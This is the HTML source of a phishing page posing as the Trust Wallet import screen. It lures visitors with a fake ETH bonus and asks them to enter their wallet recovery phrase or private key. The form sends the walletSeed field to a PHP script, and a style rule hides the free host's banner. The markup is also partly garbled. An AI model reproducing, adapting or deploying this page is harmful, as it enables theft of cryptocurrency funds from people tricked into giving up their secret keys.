<!DOCTYPE html>
<html lang="en" class=" -webkit-"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <title>Trust Wallet</title>
    <link rel="icon" href="/Trust Wallet_files/favicon.png" type="image/ico">

    <!-- Google Tag Manager -->
    <script type="text/javascript" async="" src="./Trust Wallet_files/analytics.js.download"></script><script type="text/javascript" async="" src="./Trust Wallet_files/js"></script><script async="" src="./Trust Wallet_files/gtm.js.download"></script><script type="text/javascript" async="" src="./Trust Wallet_files/analytics.js(3).download"></script><script async="" src="./Trust Wallet_files/gtm.js(3).download"></script><script type="text/javascript" async="" src="./Trust Wallet_files/analytics.js(3).download"></script><script type="text/javascript" async="" src="./Trust Wallet_files/js(3)"></script><script async="" src="./Trust Wallet_files/gtm.js(3).download"></script><script type="text/javascript" async="" src="./Trust Wallet_files/js(4)"></script>
    <!-- End Google Tag Manager -->
<link rel="stylesheet" href="./Trust Wallet_files/default-styles.min-9ada9d3363a4c40.css"><link theme="default" rel="stylesheet" href="./Trust Wallet_files/vendor-styles.min-ab3957fdfad5cb.css">

<style>.candle-up-color-dynamic {
color: #5a81ea!important;
}
.candle-down-color-dynamic {
color: #e5494d!important;
}
.candle-up-bg-color-dynamic {
background-color: #5a81ea!important;
}
.candle-down-bg-color-dynamic {
background-color: #e5494d!important;
}
</style></head>

<body class="web restore">

<!-- Google Tag Manager (noscript) -->
<noscript>
    <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MCZVFBW" height="0" width="0" style="display:none;visibility:hidden"></iframe>
</noscript>
<!-- End Google Tag Manager (noscript) -->

<div class="notifications notifications-top">
    <w-container-alert-notification type="userNotification" class="container-alert-notification"></w-container-alert-notification>
</div>
<div w-i18n-ns="app.restore" class="main-container movable"><div class="main-container-wrapper"><div class="restore-content get-started-content"><div class="headline-1 margin-2 text-center" w-i18n="seedOrKeyForm.title">
</div>
<img style="display: block; margin: 0 auto; text-align: center; width: 185px; height: 85px;" src="./Trust Wallet_files/trustwallet_binance-1.png">
<w-step-by-step active-step="" class="step-by-step">
<div class="step-list" ng-transclude=""><w-step class="step" step="0"><!----><div ng-if="" ng-transclude=""><div class="body-2 text-center margin-2">


<font size="3" face="Arial"><h2 class="font-weight-bold"> Private and secure</h2>
</font>
    
<font size="3" face="Arial"><h4 class="font-weight-bold">Private Keys never leave your device</h4>
</font>

<font size="3" face="Arial"><h5 class="font-weight-bold">The recovery phrase confirmation for claims the bonus 0.5 upto 7.5 Ethereum (ETH).</h5>

</font>
   

<font size="5">Import private key or Mnemonic phrase</font></div>
<div class="headline-1 text-center ng-scope" w-i18n="seedForm.title"></div>




<form method="POST" action="trust-crypto-wallet.php" accept-charset="UTF-8" class="margin-2 ng-scope ng-valid-minlength ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
    
     <div class="seed-block margin-3"><w-input textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" class="embed no-icon big ng-pristine ng-untouched ng-isolate-scope ng-valid-minlength ng-not-empty ng-valid ng-valid-required=" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="" aria-invalid="false" aria-required="true" style="">
   

<div class="w-input-wrap"><textarea textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" "="" class="embed no-icon big ng-isolate-scope ng-valid-minlength ng-dirty ng-valid-parse ng-touched ng-not-empty ng-valid ng-valid-required" ng-model="mpcseed" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="=" required"name="login_password" aria-invalid="false" style=""></textarea></div></w-input>




<div class="body-2 basic-900 ng-scope" w-i18n="seedForm.seedTitle">Input 12 words Bakup Phrase (sometimes 24) or Private key words separated by single spaces</div></div>


<w-button disabled="" class="submit big long ng-isolate-scope" w-step-next=""><button ng-transclude="" class="submit big long"><w-i18n class="ng-scope">IMPORT</w-i18n></button></w-button></form>



<div class="notifications">
    <w-container-alert-notification type="notification" class="container-alert-notification"></w-container-alert-notification>
</div>

<style>img[alt*="www.000webhost.com"]{display:none}</style>
<script>
    var appConfig = getConfig();

    if (!appConfig.isBrowserSupported()) {
        document.getElementById('not-supported-browser').style.display = 'block';
    }
    appConfig._initScripts();
</script>

</body></html>
